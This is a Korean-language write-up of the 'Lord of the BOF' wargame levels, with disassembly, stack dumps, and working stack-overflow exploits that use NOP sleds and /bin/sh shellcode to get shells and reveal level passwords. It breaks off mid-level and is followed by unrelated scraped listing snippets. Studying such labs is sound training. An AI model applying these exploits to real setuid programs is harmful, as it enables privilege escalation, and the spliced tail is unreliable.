26 EGG = 0xbffffe45 gdb를이용해서분석을해보겠다. lob는 gdb를이용해서분석을못하므로 tmp디렉토리를만들어그곳에서분석을하겠다. (gdb) disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %ebp,%esp 0x <main+3>: sub %esp,0x100 0x <main+9>: cmp DWORD PTR [%ebp+8],1 0x804843d <main+13>: jg 0x <main+38> 0x804843f <main+15>: push 0x80484e0 0x <main+20>: call 0x <printf> 0x <main+25>: add %esp,4 0x804844c <main+28>: push 0 0x804844e <main+30>: call 0x <exit> 0x <main+35>: add %esp,4 0x <main+38>: mov %eax,dword PTR [%ebp+12] 0x <main+41>: add %eax,4 0x804845c <main+44>: mov %edx,dword PTR [%eax] 0x804845e <main+46>: push %edx 0x804845f <main+47>: lea %eax,[%ebp-256] 0x <main+53>: push %eax 0x <main+54>: call 0x <strcpy> 0x804846b <main+59>: add %esp,8 0x804846e <main+62>: lea %eax,[%ebp-256] 0x <main+68>: push %eax 0x <main+69>: push 0x80484ec 0x804847a <main+74>: call 0x <printf> 0x804847f <main+79>: add %esp,8 0x <main+82>: leave 0x <main+83>: ret 0x <main+84>: nop 0x <main+85>: nop 0x <main+86>: nop 0x <main+87>: nop 0x <main+88>: nop 0x <main+89>: nop

27 0x804848a <main+90>: nop 0x804848b <main+91>: nop 0x804848c <main+92>: nop 0x804848d <main+93>: nop 0x804848e <main+94>: nop ---Type <return> to continue, or q <return> to quit--- 0x804848f <main+95>: nop End of assembler dump. buffer의위치가 ebp-256이라는것을알았다. buffer와 sfp를덮고, ret부분에환경변수의주소를쓰겠다. 쓰레기값 환경변수의주소공격을해보면 [gate@localhost tmp]$./gremlin `python -c "print '\x90'*260+'\x45\xfe\xff\xbf'"` Eþÿ bash$ 쉘이따지는것을확인했다. 그럼이것을본파일로가서하면 [gate@localhost gate]$./gremlin `python -c "print '\x90'*260+'\x45\xfe\xff\xbf'"` Eþÿ bash$ my-pass euid = 501 hello bof world LOB (gremlin ->cobolt) /* The Lord of the BOF : The Fellowship of the BOF - cobolt - small buffer */ int main(int argc, char *argv[]) { char buffer[16]; if(argc < 2){ printf("argv error\n"); exit(0);

28 strcpy(buffer, argv[1]); printf("%s\n", buffer); 1번문제와동일하지만 buffer의크기가작아졌다. 하지만우리는환경변수를이용하기때문에버퍼의크기는아무지장을주지않는다. 환경변수의주소를알아보겠다. gremlin]$ /tmp/ge EGG EGG = 0xbffffedb 복사해서 gdb 로분석해보겠다. (gdb) disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %ebp,%esp 0x <main+3>: sub %esp,16 0x <main+6>: cmp DWORD PTR [%ebp+8],1 0x804843a <main+10>: jg 0x <main+35> 0x804843c <main+12>: push 0x80484d0 0x <main+17>: call 0x <printf> 0x <main+22>: add %esp,4 0x <main+25>: push 0 0x804844b <main+27>: call 0x <exit> 0x <main+32>: add %esp,4 0x <main+35>: mov %eax,dword PTR [%ebp+12] 0x <main+38>: add %eax,4 0x <main+41>: mov %edx,dword PTR [%eax] 0x804845b <main+43>: push %edx 0x804845c <main+44>: lea %eax,[%ebp-16] 0x804845f <main+47>: push %eax 0x <main+48>: call 0x <strcpy> 0x <main+53>: add %esp,8 0x <main+56>: lea %eax,[%ebp-16] 0x804846b <main+59>: push %eax 0x804846c <main+60>: push 0x80484dc 0x <main+65>: call 0x <printf> 0x <main+70>: add %esp,8 0x <main+73>: leave 0x804847a <main+74>: ret

29 0x804847b <main+75>: nop 0x804847c <main+76>: nop 0x804847d <main+77>: nop 0x804847e <main+78>: nop 0x804847f <main+79>: nop End of assembler dump. buffer 의시작이 ebp-16 이라는것을알았다. 쓰레기값 20 + 환경변수주소공격을하면 [gremlin@localhost tmp]$./cobolt `python -c "print 'A'*20+'\xdb\xfe\xff\xbf'"` AAAAAAAAAAAAAAAAAAAA ÿ bash$ 원본파일에서동일하게공격하면 [gremlin@localhost gremlin]$./cobolt `python -c "print 'A'*20+'\xdb\xfe\xff\xbf'"` AAAAAAAAAAAAAAAAAAAA ÿ bash$ my-pass euid = 502 hacking exposed LOB (cobolt -> goblin) /* */ The Lord of the BOF : The Fellowship of the BOF - goblin - small buffer + stdin int main() { char buffer[16]; gets(buffer); printf("%s\n", buffer); cobolt문제와비슷하지만이번에는입력을받는함수가 gets() 함수이다. FTZ에서연습했듯이 gets() 함수는함수로사용자의입력을받는함수이다. 따라서 pipe를이용한익스플로잇을해야한다,

30 이번문제도환경변수를이용하겠다. cobolt]$ /tmp/ge EGG EGG = 0xbffffedd 복사해서 gdb 로분석해보면 (gdb) disas main Dump of assembler code for function main: 0x80483f8 <main>: push %ebp 0x80483f9 <main+1>: mov %ebp,%esp 0x80483fb <main+3>: sub %esp,16 0x80483fe <main+6>: lea %eax,[%ebp-16] 0x <main+9>: push %eax 0x <main+10>: call 0x804830c <gets> 0x <main+15>: add %esp,4 0x804840a <main+18>: lea %eax,[%ebp-16] 0x804840d <main+21>: push %eax 0x804840e <main+22>: push 0x x <main+27>: call 0x804833c <printf> 0x <main+32>: add %esp,8 0x804841b <main+35>: leave 0x804841c <main+36>: ret 0x804841d <main+37>: nop 0x804841e <main+38>: nop 0x804841f <main+39>: nop End of assembler dump. buffer 가 ebp-16 에위치한다는것을알았다. 쓰레기값 20 + 환경변수의주소공격을해보면 [cobolt@localhost tmp]$ (python -c "print 'A'*20+'\xdd\xfe\xff\xbf'";cat)./goblin AAAAAAAAAAAAAAAAAAAAÿ id uid=502(cobolt) gid=502(cobolt) groups=502(cobolt) 원본파일을공격하면 [cobolt@localhost cobolt]$ (python -c "print 'A'*20+'\xdd\xfe\xff\xbf'";cat)./goblin

31 AAAAAAAAAAAAAAAAAAAAÿ my-pass euid = 503 hackers proof LOB (goblin -> orc) /* */ The Lord of the BOF : The Fellowship of the BOF - orc - egghunter #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0); // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47]!= '\xbf') { printf("stack is still your friend.\n"); exit(0); strcpy(buffer, argv[1]); printf("%s\n", buffer);

32 egghunter 부분에서환경변수를 memset() 함수로 0 으로초기화시킨다. 우리 에게는쉘코드를넣을수있는공간이환경변수말고도여러가지있다. 그 중하나인 argv[2] 부분에넣어보겠다. 복사를한후 gdb 로분석해보겠다. (gdb) disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %ebp,%esp 0x <main+3>: sub %esp,44 0x <main+6>: cmp DWORD PTR [%ebp+8],1 0x804850a <main+10>: jg 0x <main+35> 0x804850c <main+12>: push 0x x <main+17>: call 0x <printf> 0x <main+22>: add %esp,4 0x <main+25>: push 0 0x804851b <main+27>: call 0x <exit> 0x <main+32>: add %esp,4 0x <main+35>: nop 0x <main+36>: mov DWORD PTR [%ebp-44],0x0 0x804852b <main+43>: nop 0x804852c <main+44>: lea %esi,[%esi*1] 0x <main+48>: mov %eax,dword PTR [%ebp-44] 0x <main+51>: lea %edx,[%eax*4] 0x804853a <main+58>: mov %eax,%ds:0x x804853f <main+63>: cmp DWORD PTR [%eax+%edx],0 0x <main+67>: jne 0x <main+71> 0x <main+69>: jmp 0x <main+135> 0x <main+71>: mov %eax,dword PTR [%ebp-44] 0x804854a <main+74>: lea %edx,[%eax*4] 0x <main+81>: mov %eax,%ds:0x x <main+86>: mov %edx,dword PTR [%eax+%edx] 0x <main+89>: push %edx 0x804855a <main+90>: call 0x80483f0 <strlen> 0x804855f <main+95>: add %esp,4 0x <main+98>: mov %eax,%eax 0x <main+100>: push %eax 0x <main+101>: push 0 0x <main+103>: mov %eax,dword PTR [%ebp-44]

33 0x804856a <main+106>: lea %edx,[%eax*4] 0x <main+113>: mov %eax,%ds:0x x <main+118>: mov %edx,dword PTR [%eax+%edx] 0x <main+121>: push %edx 0x804857a <main+122>: call 0x <memset> ---Type <return> to continue, or q <return> to quit--- 0x804857f <main+127>: add %esp,12 0x <main+130>: inc DWORD PTR [%ebp-44] 0x <main+133>: jmp 0x <main+48> 0x <main+135>: mov %eax,dword PTR [%ebp+12] 0x804858a <main+138>: add %eax,4 0x804858d <main+141>: mov %edx,dword PTR [%eax] 0x804858f <main+143>: add %edx,47 0x <main+146>: cmp BYTE PTR [%edx],0xbf 0x <main+149>: je 0x80485b0 <main+176> 0x <main+151>: push 0x804863c 0x804859c <main+156>: call 0x <printf> 0x80485a1 <main+161>: add %esp,4 0x80485a4 <main+164>: push 0 0x80485a6 <main+166>: call 0x <exit> 0x80485ab <main+171>: add %esp,4 0x80485ae <main+174>: mov %esi,%esi 0x80485b0 <main+176>: mov %eax,dword PTR [%ebp+12] 0x80485b3 <main+179>: add %eax,4 0x80485b6 <main+182>: mov %edx,dword PTR [%eax] 0x80485b8 <main+184>: push %edx 0x80485b9 <main+185>: lea %eax,[%ebp-40] 0x80485bc <main+188>: push %eax 0x80485bd <main+189>: call 0x <strcpy> 0x80485c2 <main+194>: add %esp,8 0x80485c5 <main+197>: lea %eax,[%ebp-40] 0x80485c8 <main+200>: push %eax 0x80485c9 <main+201>: push 0x x80485ce <main+206>: call 0x <printf> 0x80485d3 <main+211>: add %esp,8 0x80485d6 <main+214>: leave 0x80485d7 <main+215>: ret 0x80485d8 <main+216>: nop 0x80485d9 <main+217>: nop 0x80485da <main+218>: nop

34 0x80485db <main+219>: nop 0x80485dc <main+220>: nop 0x80485dd <main+221>: nop 0x80485de <main+222>: nop ---Type <return> to continue, or q <return> to quit--- 0x80485df <main+223>: nop End of assembler dump. main+185 부분을통해 buffer가 ebp-40이라는것을알았다. 그럼 argv[2] 를 nop로덮고그뒤에쉘코드를넣은후 ret을 nop의한지점으로설정해주겠다. (gdb) b * main+194 Breakpoint 1 at 0x80485c2 (gdb) r `python -c "print '\xbf'*48"` `python -c "print '\x90'*100"` Starting program: /home/goblin/tmp/orc `python -c "print '\xbf'*48"` `python -c "print '\x90'*100"` Breakpoint 1, 0x80485c2 in main () (gdb) x/100x $esp...( 생략 )... 0xbffffbc4: 0x x x x xbffffbd4: 0x x x x xbffffbe4: 0x682f0036 0x2f656d6f 0x6c626f67 0x742f6e69 0xbffffbf4: 0x6f2f706d 0xbf xbfbfbfbf 0xbfbfbfbf 0xbffffc04: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffc14: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffc24: 0xbfbfbfbf 0x00bfbfbf 0x x xbffffc34: 0x x x x xbffffc44: 0x x x x xbffffc54: 0x x x x xbffffc64: 0x x x x xbffffc74: 0x x x x xbffffc84: 0x x x x xbffffc94: 0x x x x xbffffca4: 0x x x x xbffffcb4: 0x x x x ( 생략 )... nop의주소를알았다. ret가 nop을가리키도록변조하면되겠다. 넉넉히 0xbffffc44로잡겠다.

35 쓰레기값 xbffffc44 + nop * shellcode 공격을하면 [goblin@localhost tmp]$./orc `python -c "print 'A'*44+'\x44\xfc\xff\xbf'"` `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD Segmentation fault (core dumped) 좀더정확하게 core 파일을분석하겠다. [goblin@localhost tmp]$ gdb -c core GNU gdb Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux". Core was generated by `./orc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD'. Program terminated with signal 11, Segmentation fault. #0 0xbffffc4d in?? () (gdb) x/100x $esp...( 생략 )... 0xbffffb70: 0x x x x xbffffb80: 0x x x x xbffffb90: 0x x x x2f2e0036 0xbffffba0: 0x f 0x x x xbffffbb0: 0x x x x xbffffbc0: 0x x x x xbffffbd0: 0xbffffc44 0x x x xbffffbe0: 0x x x x xbffffbf0: 0x x x x xbffffc00: 0x x x x xbffffc10: 0x x x x xbffffc20: 0x x x x xbffffc30: 0x x x50c x732f2f68 0xbffffc40: 0x622f6868 0xe3896e69 0xe x0bb0d231...( 생략 )... 음 0xbffffbf0 로 ret 를덮어야겠다. [goblin@localhost tmp]$./orc `python -c "print 'A'*44+'\xf0\xfb\xff\xbf'"`

36 `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bash$ 굳복사를해서똑같이하면 goblin]$./orc `python -c "print 'A'*44+'\xf0\xfb\xff\xbf'"` `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bash$ id uid=503(goblin) gid=503(goblin) euid=504(orc) egid=504(orc) groups=503(goblin) bash$ my-pass euid = 504 cantata core 파일을분석하면 segmentation error가발생했을때의시점에프로그램에기록된작업메모리를즉 esp와 ebp등여러레지스터상황을볼수있다. LOB /* */ (orc -> wolfman) The Lord of the BOF : The Fellowship of the BOF - wolfman - egghunter + buffer hunter #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0);

37 // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47]!= '\xbf') { printf("stack is still your friend.\n"); exit(0); strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer hunter memset(buffer, 0, 40); buffer를 0으로초기화시킨다. 응안써하지만우리는 argv[2] 를사용해서풀것이기때문에크게상관없다. 이번에는아예좀더정확한분석을위해 core파일을일부러생성해풀어보겠다. 이제부터는디렉토리생성후복사하는과정은생략해도알아서하시길바란다. (gdb)disas main... 생략... 0x80485ab <main+171>: add %esp,4 0x80485ae <main+174>: mov %esi,%esi 0x80485b0 <main+176>: mov %eax,dword PTR [%ebp+12] 0x80485b3 <main+179>: add %eax,4 0x80485b6 <main+182>: mov %edx,dword PTR [%eax] 0x80485b8 <main+184>: push %edx ---Type <return> to continue, or q <return> to quit--- 0x80485b9 <main+185>: lea %eax,[%ebp-40] 0x80485bc <main+188>: push %eax 0x80485bd <main+189>: call 0x <strcpy>... 생략... buffer가 ebp-40에위치한다는것을알았다. core파일을생성해보면 [orc@localhost tmp]$ ulimit -c unlimited [orc@localhost tmp]$./wolfman `python -c 'print "\xbf"*48'` `python -c "print

38 '\x90'*100"` Segmentation fault (core dumped) ulimit c unlimited 는 core 파일을생성해주는명령어이다. core 파일을분석해보면 [orc@localhost tmp]$ gdb -c core GNU gdb Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux". Core was generated by `./wolfman '. Program terminated with signal 11, Segmentation fault. #0 0xbfbfbfbf in?? () (gdb) x/50x $esp 0xbffffe38: 0x000001f8 0x c 0x000001f8 0x d 0xbffffe48: 0x000001f8 0x e 0x000001f8 0x xbffffe58: 0x0fabfbff 0x f 0xbffffe86 0x xbffffe68: 0x x x x xbffffe78: 0x x x x xbffffe88: 0x2e x6c6f772f 0x6e616d66 0xbfbfbf00 0xbffffe98: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffea8: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffeb8: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0x909000bf 0xbffffec8: 0x x x x xbffffed8: 0x x x x xbffffee8: 0x x x x xbffffef8: 0x x xbffffec8로 ret를덮겠다. 쓰레기값 xbffffec8 + nop * shellcode [orc@localhost tmp]$./wolfman `python c print A *44+ \xc8\xfe\xff\xbf ` `python c print \x90 *100+ \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x

39 53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 ` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɾÿ Segmentation fault (core dumped) 세상은호락호락하지않다. core 파일을분석해보겠다. [orc@localhost tmp]$ gdb -c core GNU gdb Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux". Core was generated by `./wolfman AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɾÿ '. Program terminated with signal 11, Segmentation fault. #0 0xbffffed1 in?? () (gdb) x/50x $esp 0xbffffdb8: 0x x x b 0x000001f8 0xbffffdc8: 0x c 0x000001f8 0x d 0x000001f8 0xbffffdd8: 0x e 0x000001f8 0x x0fabfbff 0xbffffde8: 0x f 0xbffffe19 0x x xbffffdf8: 0x x x x xbffffe08: 0x x x x xbffffe18: 0x x2f2e0036 0x666c6f77 0x006e616d 0xbffffe28: 0x x x x xbffffe38: 0x x x x xbffffe48: 0x x x xbffffec8 0xbffffe58: 0x x x x xbffffe68: 0x x x x xbffffe78: 0x x xbffffe78 로 ret 를덮겠다. [orc@localhost tmp]$./wolfman `python -c "print 'A'*44+'\x78\xfe\xff\xbf'"` `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x 8 9 \ x e 1 \ x 3 1 \ x d 2 \ x b 0 \ x 0 b \ x c d \ x 8 0 ' " ` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxþÿ bash$ 쉘을획득! 똑같이해보면 [orc@localhost orc]$./wolfman `python -c "print 'A'*44+'\x78\xfe\xff\xbf'"`

40 `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x 8 9 \ x e 1 \ x 3 1 \ x d 2 \ x b 0 \ x 0 b \ x c d \ x 8 0 ' " ` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxþÿ bash$ id uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc) bash$ my-pass euid = 505 love eyuna LOB (wolfman -> darkelf) /* */ The Lord of the BOF : The Fellowship of the BOF - darkelf - egghunter + buffer hunter + check length of argv[1] #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0); // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47]!= '\xbf') { printf("stack is still your friend.\n"); exit(0);

41 // check the length of argument if(strlen(argv[1]) > 48){ printf("argument is too long!\n"); exit(0); strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer hunter memset(buffer, 0, 40); 전단계에서추가된점은 argv[1] 의길이를체크한다. 하지만우리는 argv[2] 를사용하면된다. 자빠르게 gdb 로분석한후풀어보자. (gdb) disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %ebp,%esp 0x <main+3>: sub %esp,44 0x <main+6>: cmp DWORD PTR [%ebp+8],1 0x804850a <main+10>: jg 0x <main+35> 0x804850c <main+12>: push 0x x <main+17>: call 0x <printf> 0x <main+22>: add %esp,4 0x <main+25>: push 0 0x804851b <main+27>: call 0x <exit> 0x <main+32>: add %esp,4 0x <main+35>: nop 0x <main+36>: mov DWORD PTR [%ebp-44],0x0 0x804852b <main+43>: nop 0x804852c <main+44>: lea %esi,[%esi*1] 0x <main+48>: mov %eax,dword PTR [%ebp-44] 0x <main+51>: lea %edx,[%eax*4] 0x804853a <main+58>: mov %eax,%ds:0x80497a4 0x804853f <main+63>: cmp DWORD PTR [%eax+%edx],0 0x <main+67>: jne 0x <main+71>

42 0x <main+69>: jmp 0x <main+135> 0x <main+71>: mov %eax,dword PTR [%ebp-44] 0x804854a <main+74>: lea %edx,[%eax*4] 0x <main+81>: mov %eax,%ds:0x80497a4 0x <main+86>: mov %edx,dword PTR [%eax+%edx] 0x <main+89>: push %edx 0x804855a <main+90>: call 0x80483f0 <strlen> 0x804855f <main+95>: add %esp,4 0x <main+98>: mov %eax,%eax 0x <main+100>: push %eax 0x <main+101>: push 0 0x <main+103>: mov %eax,dword PTR [%ebp-44] 0x804856a <main+106>: lea %edx,[%eax*4] 0x <main+113>: mov %eax,%ds:0x80497a4 0x <main+118>: mov %edx,dword PTR [%eax+%edx] 0x <main+121>: push %edx 0x804857a <main+122>: call 0x <memset> ---Type <return> to continue, or q <return> to quit--- 0x804857f <main+127>: add %esp,12 0x <main+130>: inc DWORD PTR [%ebp-44] 0x <main+133>: jmp 0x <main+48> 0x <main+135>: mov %eax,dword PTR [%ebp+12] 0x804858a <main+138>: add %eax,4 0x804858d <main+141>: mov %edx,dword PTR [%eax] 0x804858f <main+143>: add %edx,47 0x <main+146>: cmp BYTE PTR [%edx],0xbf 0x <main+149>: je 0x80485b0 <main+176> 0x <main+151>: push 0x804867c 0x804859c <main+156>: call 0x <printf> 0x80485a1 <main+161>: add %esp,4 0x80485a4 <main+164>: push 0 0x80485a6 <main+166>: call 0x <exit> 0x80485ab <main+171>: add %esp,4 0x80485ae <main+174>: mov %esi,%esi 0x80485b0 <main+176>: mov %eax,dword PTR [%ebp+12] 0x80485b3 <main+179>: add %eax,4 0x80485b6 <main+182>: mov %edx,dword PTR [%eax] 0x80485b8 <main+184>: push %edx 0x80485b9 <main+185>: call 0x80483f0 <strlen> 0x80485be <main+190>: add %esp,4

43 0x80485c1 <main+193>: mov %eax,%eax 0x80485c3 <main+195>: cmp %eax,48 0x80485c6 <main+198>: jbe 0x80485e0 <main+224> 0x80485c8 <main+200>: push 0x x80485cd <main+205>: call 0x <printf> 0x80485d2 <main+210>: add %esp,4 0x80485d5 <main+213>: push 0 0x80485d7 <main+215>: call 0x <exit> 0x80485dc <main+220>: add %esp,4 0x80485df <main+223>: nop 0x80485e0 <main+224>: mov %eax,dword PTR [%ebp+12] 0x80485e3 <main+227>: add %eax,4 0x80485e6 <main+230>: mov %edx,dword PTR [%eax] 0x80485e8 <main+232>: push %edx 0x80485e9 <main+233>: lea %eax,[%ebp-40] 0x80485ec <main+236>: push %eax ---Type <return> to continue, or q <return> to quit--- 0x80485ed <main+237>: call 0x <strcpy> 0x80485f2 <main+242>: add %esp,8 0x80485f5 <main+245>: lea %eax,[%ebp-40] 0x80485f8 <main+248>: push %eax 0x80485f9 <main+249>: push 0x80486b0 0x80485fe <main+254>: call 0x <printf> 0x <main+259>: add %esp,8 0x <main+262>: push 40 0x <main+264>: push 0 0x804860a <main+266>: lea %eax,[%ebp-40] 0x804860d <main+269>: push %eax 0x804860e <main+270>: call 0x <memset> 0x <main+275>: add %esp,12 0x <main+278>: leave 0x <main+279>: ret 0x <main+280>: nop 0x <main+281>: nop 0x804861a <main+282>: nop 0x804861b <main+283>: nop 0x804861c <main+284>: nop 0x804861d <main+285>: nop 0x804861e <main+286>: nop 0x804861f <main+287>: nop

44 End of assembler dump. buffer가 ebp-40에위치한다는것을알았다. 이제 strcpy() 함수다음에 breakpoint를걸고 argv[2] 에 nop를넣어주소를알아내겠다. (gdb) b * main+242 Breakpoint 1 at 0x80485f2 (gdb) r `python -c "print '\xbf'*48"` `python -c "print '\x90'*100"` Starting program: /home/wolfman/tmp/darkelf `python -c "print '\xbf'*48"` `python -c "print '\x90'*100"` Breakpoint 1, 0x80485f2 in main () (gdb) x/50x $esp... 생략... 0xbffffbb4: 0xbf00666c 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffbc4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffbd4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffbe4: 0x00bfbfbf 0x x x xbffffbf4: 0x x x x xbffffc04: 0x x x x xbffffc14: 0x x x x xbffffc24: 0x x x x xbffffc34: 0x x x x xbffffc44: 0x x x x xbffffc54: 0x x x x xbffffc64: 0x x x x xbffffc74: 0x x 생략... 0xbffffc04로 ret를덮겠다. 쓰레기값 xbffffc04 + nop + shellcode 공격을해보면 [wolfman@localhost tmp]$./darkelf `python -c "print 'A'*44+'\x04\xfc\xff\xbf'"` `python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bash$ 오이번엔깔끔하게쉘을획득했다. 원본파일에도공격을하면 [wolfman@localhost wolfman]$./darkelf `python -c "print 'A'*44+'\x04\xfc\xff\xbf'"` `python -c "print

45 '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bash$ id uid=505(wolfman) gid=505(wolfman) euid=506(darkelf) egid=506(darkelf) groups=505(wolfman) bash$ my-pass euid = 506 kernel crashed LOB (darkelf -> orge) /* */ The Lord of the BOF : The Fellowship of the BOF - orge - check argv[0] #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0); // here is changed! if(strlen(argv[0])!= 77){ printf("argv[0] error\n"); exit(0); // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i]));

46 if(argv[1][47]!= '\xbf') { printf("stack is still your friend.\n"); exit(0); // check the length of argument if(strlen(argv[1]) > 48){ printf("argument is too long!\n"); exit(0); strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer hunter memset(buffer, 0, 40); 전단꼐와달라진점이있다면 argv[0] 의길이를 77로검사한다는것이다. 이럴때는심볼릭링크기능을사용하면해결할수있다. 심볼릭링크를이용해이름을 77만큼맞춘후 argv[2] 에 nop과 shellcode를넣어쉘을획득하겠다. 일단심볼릭링크를이용하는방법을알아야한다. [ln s 원본파일링크링크파일 ] 파일을복사해서분석해보겠다. [darkelf@localhost tmp]$ pwd /home/darkelf/tmp tmp 까지 17 개로이루어져있으니 / 를생각해서 A*59 를하면되겠다. [darkelf@localhost tmp]$ ln -s orge `python -c "print 'A'*59"` [darkelf@localhost tmp]$ ll total 16 lrwxrwxrwx 1 darkelf darkelf 4 May 20 22:38 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> orge -rwsr-sr-x 1 darkelf darkelf May 20 22:34 orge gdb 로분석하면 [darkelf@localhost tmp]$ gdb -q

Level 1. Trivial level1]$ cat hint level2 권한에 setuid 가걸린파일을찾는다. level1]$ find / -user level2 2>/dev/null find / 최상위폴더부터찾겠다. -u

Level 1. Trivial level1]$ cat hint level2 권한에 setuid 가걸린파일을찾는다. level1]$ find / -user level2 2>/dev/null find / 최상위폴더부터찾겠다. -u HackerSchool WarGame 풀이 Written by StolenByte http://stolenbyte.egloos.com - 1 - Level 1. Trivial [level1@ftz level1]$ cat hint level2 권한에 setuid 가걸린파일을찾는다. [level1@ftz level1]$ find / -user level2 2>/dev/null

More information

PowerPoint Template

PowerPoint Template BoF 원정대서비스 목차 환경구성 http://www.hackerschool.org/hs_boards/zboard.php?id=hs_notice&no=1170881885 전용게시판 http://www.hackerschool.org/hs_boards/zboard.php?id=bof_fellowship Putty War game 2 LOB 란? 해커스쿨에서제공하는

More information

hlogin2

hlogin2 0x02. Stack Corruption off-limit Kernel Stack libc Heap BSS Data Code off-limit Kernel Kernel : OS Stack libc Heap BSS Data Code Stack : libc : Heap : BSS, Data : bss Code : off-limit Kernel Kernel : OS

More information

Contents 1. 목적 풀이 Level

Contents 1. 목적 풀이 Level FTZ 풀이보고서 Moomoo/badass4514@gmail.com 1 Contents 1. 목적 -------------------------------------------------------------- 3 2. 풀이 Level1 -----------------------------------------------------------------------

More information

The Lord of the BOF -The Fellowship of the BOF 풀이보고서 by phpmyadmin -Contents- 0x00 프롤로그

The Lord of the BOF -The Fellowship of the BOF 풀이보고서 by phpmyadmin -Contents- 0x00 프롤로그 The Lord of the BOF -The Fellowship of the BOF 풀이보고서 by phpmyadmin (soh357@gmail.com) -Contents- 0x00 프롤로그 -------------------------------------------------------------------------- 2 0x01 gate -----------------------------------------------------------------------------

More information

Deok9_Exploit Technique

Deok9_Exploit Technique Exploit Technique CodeEngn Co-Administrator!!! and Team Sur3x5F Member Nick : Deok9 E-mail : DDeok9@gmail.com HomePage : http://deok9.sur3x5f.org Twitter :@DDeok9 > 1. Shell Code 2. Security

More information

Smashing the Lord Of the Bof

